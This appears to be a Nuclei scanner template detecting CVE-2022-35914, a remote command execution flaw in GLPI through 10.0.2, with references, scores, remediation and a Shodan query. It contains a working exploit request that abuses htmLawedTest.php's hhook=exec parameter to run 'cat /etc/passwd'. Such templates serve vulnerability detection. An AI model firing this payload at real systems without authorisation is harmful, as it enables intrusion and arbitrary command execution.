id: CVE-2022-35914 info: name: GLPI <=10.0.2 - Remote Command Execution author: For3stCo1d severity: critical description: | GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability. reference: - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914 - https://github.com/cosad3s/CVE-2022-35914-poc - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed - https://nvd.nist.gov/vuln/detail/CVE-2022-35914 - https://github.com/glpi-project/glpi/releases classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35914 cwe-id: CWE-74 epss-score: 0.96908 epss-percentile: 0.99653 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: glpi-project product: glpi shodan-query: http.favicon.hash:"-1474875778" tags: cve,cve2022,glpi,rce,kev,glpi-project variables: cmd: "cat+/etc/passwd" http: - raw: - | POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: sid=foo sid=foo&hhook=exec&text={{cmd}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a004730450221009f0bcb9c4ecbc0fa78e6e805c9b0e26a41a09eaf859b80882f02481654f28a0402201349d2904e404382aee64881fe8e567d5b3edccc803710563d16722be50c905a:922c64590222798bb761d5b6d8e72950